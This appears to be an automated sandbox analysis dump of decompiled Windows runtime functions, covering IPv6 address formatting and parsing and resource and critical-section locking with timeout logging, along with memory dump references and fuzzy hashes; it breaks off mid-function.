                                                                                        0x01f653ea
                                                                                        0x00000000
                                                                                        0x01f653d6
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa22b6
                                                                                        0x00000000
                                                                                        0x01fa228f
                                                                                        0x01fa2349
                                                                                        0x01fa234d
                                                                                        0x01fa2251
                                                                                        0x01fa2251
                                                                                        0x00000000
                                                                                        0x01fa2251
                                                                                        0x01fa21a4
                                                                                        0x01fa21a4
                                                                                        0x01fa21a6
                                                                                        0x01fa21a8
                                                                                        0x01fa21ac
                                                                                        0x01fa21b6
                                                                                        0x01fa21b8
                                                                                        0x01fa21bc
                                                                                        0x01fa21be
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c0
                                                                                        0x01fa21c2
                                                                                        0x01fa21c4
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c4
                                                                                        0x01fa21c6
                                                                                        0x01fa21c6
                                                                                        0x01fa21c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fa21c8
                                                                                        0x01fa21a2
                                                                                        0x00000000
                                                                                        0x01fa2183
                                                                                        0x01f8057b
                                                                                        0x01f8057d
                                                                                        0x01f80581
                                                                                        0x01f80583
                                                                                        0x01fa2178
                                                                                        0x00000000
                                                                                        0x01f80589
                                                                                        0x01f8058f
                                                                                        0x01f8058f
                                                                                        0x01f80583
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FA2206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-4236105082
                                                                                        • Opcode ID: fe76a3ed8006e629cfbbc75e462dd826806c443d9d0fd95f1ce11d9fa40bc8c4
                                                                                        • Instruction ID: dba03aa5b62f4d87054bccfd8b6c04b66f22ebcdaa653e6fa0053151d9c07c8b
                                                                                        • Opcode Fuzzy Hash: fe76a3ed8006e629cfbbc75e462dd826806c443d9d0fd95f1ce11d9fa40bc8c4
                                                                                        • Instruction Fuzzy Hash: F0513975B00212ABFB19DE18CC81F6677A9AFD4710F214219FD55DF285D937EC4287A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E01F814C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                        				signed int _v8;
                                                                                        				char _v10;
                                                                                        				char _v140;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t24;
                                                                                        				void* _t26;
                                                                                        				signed int _t29;
                                                                                        				signed int _t34;
                                                                                        				signed int _t40;
                                                                                        				intOrPtr _t45;
                                                                                        				void* _t51;
                                                                                        				intOrPtr* _t52;
                                                                                        				void* _t54;
                                                                                        				signed int _t57;
                                                                                        				void* _t58;
                                                                                        
                                                                                        				_t51 = __edx;
                                                                                        				_t24 =  *0x2022088; // 0x76801594
                                                                                        				_v8 = _t24 ^ _t57;
                                                                                        				_t45 = _a16;
                                                                                        				_t53 = _a4;
                                                                                        				_t52 = _a20;
                                                                                        				if(_a4 == 0 || _t52 == 0) {
                                                                                        					L10:
                                                                                        					_t26 = 0xc000000d;
                                                                                        				} else {
                                                                                        					if(_t45 == 0) {
                                                                                        						if( *_t52 == _t45) {
                                                                                        							goto L3;
                                                                                        						} else {
                                                                                        							goto L10;
                                                                                        						}
                                                                                        					} else {
                                                                                        						L3:
                                                                                        						_t28 =  &_v140;
                                                                                        						if(_a12 != 0) {
                                                                                        							_push("[");
                                                                                        							_push(0x41);
                                                                                        							_push( &_v140);
                                                                                        							_t29 = E01F77707();
                                                                                        							_t58 = _t58 + 0xc;
                                                                                        							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                        						}
                                                                                        						_t54 = E01F813CB(_t53, _t28);
                                                                                        						if(_a8 != 0) {
                                                                                        							_t34 = E01F77707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                        							_t58 = _t58 + 0x10;
                                                                                        							_t54 = _t54 + _t34 * 2;
                                                                                        						}
                                                                                        						if(_a12 != 0) {
                                                                                        							_t40 = E01F77707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                        							_t58 = _t58 + 0x10;
                                                                                        							_t54 = _t54 + _t40 * 2;
                                                                                        						}
                                                                                        						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                        						 *_t52 = _t53;
                                                                                        						if( *_t52 < _t53) {
                                                                                        							goto L10;
                                                                                        						} else {
                                                                                        							E01F42340(_t45,  &_v140, _t53 + _t53);
                                                                                        							_t26 = 0;
                                                                                        						}
                                                                                        					}
                                                                                        				}
                                                                                        				return E01F4E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                        			}





















                                                                                        APIs
                                                                                        • ___swprintf_l.LIBCMT ref: 01FAEA22
                                                                                          • Part of subcall function 01F813CB: ___swprintf_l.LIBCMT ref: 01F8146B
                                                                                          • Part of subcall function 01F813CB: ___swprintf_l.LIBCMT ref: 01F81490
                                                                                        • ___swprintf_l.LIBCMT ref: 01F8156D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: %%%u$]:%u
                                                                                        • API String ID: 48624451-3050659472
                                                                                        • Opcode ID: 88b379c9eb7316b274c94e0852cd1edcd34f730460502d3f33e4325898458c35
                                                                                        • Instruction ID: 93296927a50b33a42ea614b707deb158a39ee0fa617e070863ae33a42792d156
                                                                                        • Opcode Fuzzy Hash: 88b379c9eb7316b274c94e0852cd1edcd34f730460502d3f33e4325898458c35
                                                                                        • Instruction Fuzzy Hash: BB21D1B2D0021A9FDB21EE58CC44AEB77BCBB50300F484616ED46D7101DB76EA5A8BE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 44%
                                                                                        			E01F653A5(signed int _a4, char _a8) {
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t32;
                                                                                        				signed int _t37;
                                                                                        				signed int _t40;
                                                                                        				signed int _t42;
                                                                                        				void* _t45;
                                                                                        				intOrPtr _t46;
                                                                                        				signed int _t49;
                                                                                        				void* _t51;
                                                                                        				signed int _t57;
                                                                                        				signed int _t64;
                                                                                        				signed int _t71;
                                                                                        				void* _t74;
                                                                                        				intOrPtr _t78;
                                                                                        				signed int* _t79;
                                                                                        				void* _t85;
                                                                                        				signed int _t86;
                                                                                        				signed int _t92;
                                                                                        				void* _t104;
                                                                                        				void* _t105;
                                                                                        
                                                                                        				_t64 = _a4;
                                                                                        				_t32 =  *(_t64 + 0x28);
                                                                                        				_t71 = _t64 + 0x28;
                                                                                        				_push(_t92);
                                                                                        				if(_t32 < 0) {
                                                                                        					_t78 =  *[fs:0x18];
                                                                                        					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                        					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                        						goto L3;
                                                                                        					} else {
                                                                                        						__eflags = _t32 | 0xffffffff;
                                                                                        						asm("lock xadd [ecx], eax");
                                                                                        						return 1;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L3:
                                                                                        					_push(_t86);
                                                                                        					while(1) {
                                                                                        						L4:
                                                                                        						__eflags = _t32;
                                                                                        						if(_t32 == 0) {
                                                                                        							break;
                                                                                        						}
                                                                                        						__eflags = _a8;
                                                                                        						if(_a8 == 0) {
                                                                                        							__eflags = 0;
                                                                                        							return 0;
                                                                                        						} else {
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                        							_t79 = _t64 + 0x24;
                                                                                        							_t71 = 1;
                                                                                        							asm("lock xadd [eax], ecx");
                                                                                        							_t32 =  *(_t64 + 0x28);
                                                                                        							_a4 = _t32;
                                                                                        							__eflags = _t32;
                                                                                        							if(_t32 != 0) {
                                                                                        								L19:
                                                                                        								_t86 = 0;
                                                                                        								__eflags = 0;
                                                                                        								while(1) {
                                                                                        									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                        									asm("sbb esi, esi");
                                                                                        									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020201c0;
                                                                                        									_push(_t92);
                                                                                        									_push(0);
                                                                                        									_t37 = E01F3F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                        									__eflags = _t37 - 0x102;
                                                                                        									if(_t37 != 0x102) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t71 =  *(_t92 + 4);
                                                                                        									_t85 =  *_t92;
                                                                                        									_t51 = E01F84FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                        									_push(_t85);
                                                                                        									_push(_t51);
                                                                                        									E01F93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                        									E01F93F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                        									_t86 = _t86 + 1;
                                                                                        									_t105 = _t104 + 0x28;
                                                                                        									__eflags = _t86 - 2;
                                                                                        									if(__eflags > 0) {
                                                                                        										E01FC217A(_t71, __eflags, _t64);
                                                                                        									}
                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                        									_push(0);
                                                                                        									_push(0x65);
                                                                                        									E01F93F92();
                                                                                        									_t104 = _t105 + 0xc;
                                                                                        								}
                                                                                        								__eflags = _t37;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t37);
                                                                                        									E01F83915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                        									asm("int3");
                                                                                        									_t40 =  *_t71;
                                                                                        									 *_t71 = 0;
                                                                                        									__eflags = _t40;
                                                                                        									if(_t40 == 0) {
                                                                                        										L1:
                                                                                        										_t42 = E01F65384(_t92 + 0x24);
                                                                                        										if(_t42 != 0) {
                                                                                        											goto L31;
                                                                                        										} else {
                                                                                        											goto L2;
                                                                                        										}
                                                                                        									} else {
                                                                                        										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                        										_push( &_a4);
                                                                                        										_push(_t40);
                                                                                        										_t49 = E01F3F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                        										__eflags = _t49;
                                                                                        										if(__eflags >= 0) {
                                                                                        											goto L1;
                                                                                        										} else {
                                                                                        											_push(_t49);
                                                                                        											E01F83915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                        											L31:
                                                                                        											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                        											_push( &_a4);
                                                                                        											_push(1);
                                                                                        											_t42 = E01F3F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                        											__eflags = _t42;
                                                                                        											if(__eflags >= 0) {
                                                                                        												L2:
                                                                                        												return _t42;
                                                                                        											} else {
                                                                                        												_push(_t42);
                                                                                        												E01F83915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                        												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                        												_push( &_a4);
                                                                                        												_push(1);
                                                                                        												_t42 = E01F3F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                        												__eflags = _t42;
                                                                                        												if(__eflags >= 0) {
                                                                                        													goto L2;
                                                                                        												} else {
                                                                                        													_push(_t42);
                                                                                        													_t45 = E01F83915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                        													asm("int3");
                                                                                        													while(1) {
                                                                                        														_t74 = _t45;
                                                                                        														__eflags = _t45 - 1;
                                                                                        														if(_t45 != 1) {
                                                                                        															break;
                                                                                        														}
                                                                                        														_t86 = _t86 | 0xffffffff;
                                                                                        														_t45 = _t74;
                                                                                        														asm("lock cmpxchg [ebx], edi");
                                                                                        														__eflags = _t45 - _t74;
                                                                                        														if(_t45 != _t74) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															_t46 =  *[fs:0x18];
                                                                                        															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                        															return _t46;
                                                                                        														}
                                                                                        														goto L37;
                                                                                        													}
                                                                                        													E01F65329(_t74, _t92);
                                                                                        													_push(1);
                                                                                        													return E01F653A5(_t92);
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t32 =  *(_t64 + 0x28);
                                                                                        									continue;
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t71 =  *_t79;
                                                                                        								__eflags = _t71;
                                                                                        								if(__eflags > 0) {
                                                                                        									while(1) {
                                                                                        										_t57 = _t71;
                                                                                        										asm("lock cmpxchg [edi], esi");
                                                                                        										__eflags = _t57 - _t71;
                                                                                        										if(_t57 == _t71) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t71 = _t57;
                                                                                        										__eflags = _t57;
                                                                                        										if(_t57 > 0) {
                                                                                        											continue;
                                                                                        										}
                                                                                        										break;
                                                                                        									}
                                                                                        									_t32 = _a4;
                                                                                        									__eflags = _t71;
                                                                                        								}
                                                                                        								if(__eflags != 0) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L19;
                                                                                        								}
                                                                                        							}
                                                                                        						}
                                                                                        						goto L37;
                                                                                        					}
                                                                                        					_t71 = _t71 | 0xffffffff;
                                                                                        					_t32 = 0;
                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                        					__eflags = 0;
                                                                                        					if(0 != 0) {
                                                                                        						goto L4;
                                                                                        					} else {
                                                                                        						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                        						return 1;
                                                                                        					}
                                                                                        				}
                                                                                        				L37:
                                                                                        			}


























                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FA22F4
                                                                                        Strings
                                                                                        • RTL: Resource at %p, xrefs: 01FA230B
                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FA22FC
                                                                                        • RTL: Re-Waiting, xrefs: 01FA2328
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                        • API String ID: 885266447-871070163
                                                                                        • Opcode ID: 90d440d0590ba49444acd53a0111af4717423cb9513d8a6a6bfc576c9e94bf16
                                                                                        • Instruction ID: 093826d039938c9b3f654f053b27d9beccc7b94b184401521ca907924e5b5db0
                                                                                        • Opcode Fuzzy Hash: 90d440d0590ba49444acd53a0111af4717423cb9513d8a6a6bfc576c9e94bf16
                                                                                        • Instruction Fuzzy Hash: DC511871B00302ABEB15EB28CC81FAA739DAF55760F104219FD45DB251E677E84187A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 51%
                                                                                        			E01F6EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                        				intOrPtr _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				signed int _v24;
                                                                                        				intOrPtr* _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				short _v66;
                                                                                        				char _v72;
                                                                                        				void* __esi;
                                                                                        				intOrPtr _t38;
                                                                                        				intOrPtr _t39;
                                                                                        				signed int _t40;
                                                                                        				intOrPtr _t42;
                                                                                        				intOrPtr _t43;
                                                                                        				signed int _t44;
                                                                                        				void* _t46;
                                                                                        				intOrPtr _t48;
                                                                                        				signed int _t49;
                                                                                        				intOrPtr _t50;
                                                                                        				intOrPtr _t53;
                                                                                        				signed char _t67;
                                                                                        				void* _t72;
                                                                                        				intOrPtr _t77;
                                                                                        				intOrPtr* _t80;
                                                                                        				intOrPtr _t84;
                                                                                        				intOrPtr* _t85;
                                                                                        				void* _t91;
                                                                                        				void* _t92;
                                                                                        				void* _t93;
                                                                                        
                                                                                        				_t80 = __edi;
                                                                                        				_t75 = __edx;
                                                                                        				_t70 = __ecx;
                                                                                        				_t84 = _a4;
                                                                                        				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                        					E01F5DA92(__ecx, __edx, __eflags, _t84);
                                                                                        					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                        				}
                                                                                        				_push(0);
                                                                                        				__eflags = _t38 - 0xffffffff;
                                                                                        				if(_t38 == 0xffffffff) {
                                                                                        					_t39 =  *0x202793c; // 0x0
                                                                                        					_push(0);
                                                                                        					_push(_t84);
                                                                                        					_t40 = E01F416C0(_t39);
                                                                                        				} else {
                                                                                        					_t40 = E01F3F9D4(_t38);
                                                                                        				}
                                                                                        				_pop(_t85);
                                                                                        				__eflags = _t40;
                                                                                        				if(__eflags < 0) {
                                                                                        					_push(_t40);
                                                                                        					E01F83915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                        					asm("int3");
                                                                                        					while(1) {
                                                                                        						L21:
                                                                                        						_t76 =  *[fs:0x18];
                                                                                        						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                        						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                        						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                        							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                        							_v66 = 0x1722;
                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_t76 =  &_v72;
                                                                                        							_push( &_v72);
                                                                                        							_v28 = _t85;
                                                                                        							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                        							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_push(0x10);
                                                                                        							_push(0x20402);
                                                                                        							E01F401A4( *0x7ffe0382 & 0x000000ff);
                                                                                        						}
                                                                                        						while(1) {
                                                                                        							_t43 = _v8;
                                                                                        							_push(_t80);
                                                                                        							_push(0);
                                                                                        							__eflags = _t43 - 0xffffffff;
                                                                                        							if(_t43 == 0xffffffff) {
                                                                                        								_t71 =  *0x202793c; // 0x0
                                                                                        								_push(_t85);
                                                                                        								_t44 = E01F41F28(_t71);
                                                                                        							} else {
                                                                                        								_t44 = E01F3F8CC(_t43);
                                                                                        							}
                                                                                        							__eflags = _t44 - 0x102;
                                                                                        							if(_t44 != 0x102) {
                                                                                        								__eflags = _t44;
                                                                                        								if(__eflags < 0) {
                                                                                        									_push(_t44);
                                                                                        									E01F83915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                        									asm("int3");
                                                                                        									E01FC2306(_t85);
                                                                                        									__eflags = _t67 & 0x00000002;
                                                                                        									if((_t67 & 0x00000002) != 0) {
                                                                                        										_t7 = _t67 + 2; // 0x4
                                                                                        										_t72 = _t7;
                                                                                        										asm("lock cmpxchg [edi], ecx");
                                                                                        										__eflags = _t67 - _t67;
                                                                                        										if(_t67 == _t67) {
                                                                                        											E01F6EC56(_t72, _t76, _t80, _t85);
                                                                                        										}
                                                                                        									}
                                                                                        									return 0;
                                                                                        								} else {
                                                                                        									__eflags = _v24;
                                                                                        									if(_v24 != 0) {
                                                                                        										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                        									}
                                                                                        									return 2;
                                                                                        								}
                                                                                        								goto L36;
                                                                                        							}
                                                                                        							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                        							_push(_t67);
                                                                                        							_t46 = E01F84FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                        							_push(_t77);
                                                                                        							E01F93F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                        							_t48 =  *_t85;
                                                                                        							_t92 = _t91 + 0x18;
                                                                                        							__eflags = _t48 - 0xffffffff;
                                                                                        							if(_t48 == 0xffffffff) {
                                                                                        								_t49 = 0;
                                                                                        								__eflags = 0;
                                                                                        							} else {
                                                                                        								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                        							}
                                                                                        							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                        							_push(_t49);
                                                                                        							_t50 = _v12;
                                                                                        							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                        							_push(_t85);
                                                                                        							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                        							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                                                        							E01F93F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                                                        							_t53 =  *_t85;
                                                                                        							_t93 = _t92 + 0x20;
                                                                                        							_t67 = _t67 + 1;
                                                                                        							__eflags = _t53 - 0xffffffff;
                                                                                        							if(_t53 != 0xffffffff) {
                                                                                        								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                        								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                                                        							}
                                                                                        							__eflags = _t67 - 2;
                                                                                        							if(_t67 > 2) {
                                                                                        								__eflags = _t85 - 0x20220c0;
                                                                                        								if(_t85 != 0x20220c0) {
                                                                                        									_t76 = _a4;
                                                                                        									__eflags = _a4 - _a8;
                                                                                        									if(__eflags == 0) {
                                                                                        										E01FC217A(_t71, __eflags, _t85);
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							_push("RTL: Re-Waiting\n");
                                                                                        							_push(0);
                                                                                        							_push(0x65);
                                                                                        							_a8 = _a4;
                                                                                        							E01F93F92();
                                                                                        							_t91 = _t93 + 0xc;
                                                                                        							__eflags =  *0x7ffe0382;
                                                                                        							if( *0x7ffe0382 != 0) {
                                                                                        								goto L21;
                                                                                        							}
                                                                                        						}
                                                                                        						goto L36;
                                                                                        					}
                                                                                        				} else {
                                                                                        					return _t40;
                                                                                        				}
                                                                                        				L36:
                                                                                        			}


































                                                                                        Strings
                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FA248D
                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FA24BD
                                                                                        • RTL: Re-Waiting, xrefs: 01FA24FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                        • API String ID: 0-3177188983
                                                                                        • Opcode ID: 8d8154177a75b0abcd36199750449773c4d56d742c80e054d4ebe29af3951dc6
                                                                                        • Instruction ID: ec29a2505b0072d025b9b86c5cde454b36c8218cfc4c4267931793e826c61def
                                                                                        • Opcode Fuzzy Hash: 8d8154177a75b0abcd36199750449773c4d56d742c80e054d4ebe29af3951dc6
                                                                                        • Instruction Fuzzy Hash: 8941E8B1A00305EFDB24EB68CC84F6A7BB9EF84720F108605FA559B2C2D637E941C761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E01F7FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				signed int _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _t105;
                                                                                        				void* _t110;
                                                                                        				char _t114;
                                                                                        				short _t115;
                                                                                        				void* _t118;
                                                                                        				signed short* _t119;
                                                                                        				short _t120;
                                                                                        				char _t122;
                                                                                        				void* _t127;
                                                                                        				void* _t130;
                                                                                        				signed int _t136;
                                                                                        				intOrPtr _t143;
                                                                                        				signed int _t158;
                                                                                        				signed short* _t164;
                                                                                        				signed int _t167;
                                                                                        				void* _t170;
                                                                                        
                                                                                        				_t158 = 0;
                                                                                        				_t164 = _a4;
                                                                                        				_v20 = 0;
                                                                                        				_v24 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v12 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_t136 = 0;
                                                                                        				while(1) {
                                                                                        					_t167 =  *_t164 & 0x0000ffff;
                                                                                        					if(_t167 == _t158) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t118 = _v20 - _t158;
                                                                                        					if(_t118 == 0) {
                                                                                        						if(_t167 == 0x3a) {
                                                                                        							if(_v12 > _t158 || _v8 > _t158) {
                                                                                        								break;
                                                                                        							} else {
                                                                                        								_t119 =  &(_t164[1]);
                                                                                        								if( *_t119 != _t167) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t143 = 2;
                                                                                        								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                        								_v28 = 1;
                                                                                        								_v8 = _t143;
                                                                                        								_t136 = _t136 + 1;
                                                                                        								L47:
                                                                                        								_t164 = _t119;
                                                                                        								_v20 = _t143;
                                                                                        								L14:
                                                                                        								if(_v24 == _t158) {
                                                                                        									L19:
                                                                                        									_t164 =  &(_t164[1]);
                                                                                        									_t158 = 0;
                                                                                        									continue;
                                                                                        								}
                                                                                        								if(_v12 == _t158) {
                                                                                        									if(_v16 > 4) {
                                                                                        										L29:
                                                                                        										return 0xc000000d;
                                                                                        									}
                                                                                        									_t120 = E01F7EE02(_v24, _t158, 0x10);
                                                                                        									_t170 = _t170 + 0xc;
                                                                                        									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                        									_t136 = _t136 + 1;
                                                                                        									goto L19;
                                                                                        								}
                                                                                        								if(_v16 > 3) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								_t122 = E01F7EE02(_v24, _t158, 0xa);
                                                                                        								_t170 = _t170 + 0xc;
                                                                                        								if(_t122 > 0xff) {
                                                                                        									goto L29;
                                                                                        								}
                                                                                        								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                        								goto L19;
                                                                                        							}
                                                                                        						}
                                                                                        						L21:
                                                                                        						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                        							break;
                                                                                        						} else {
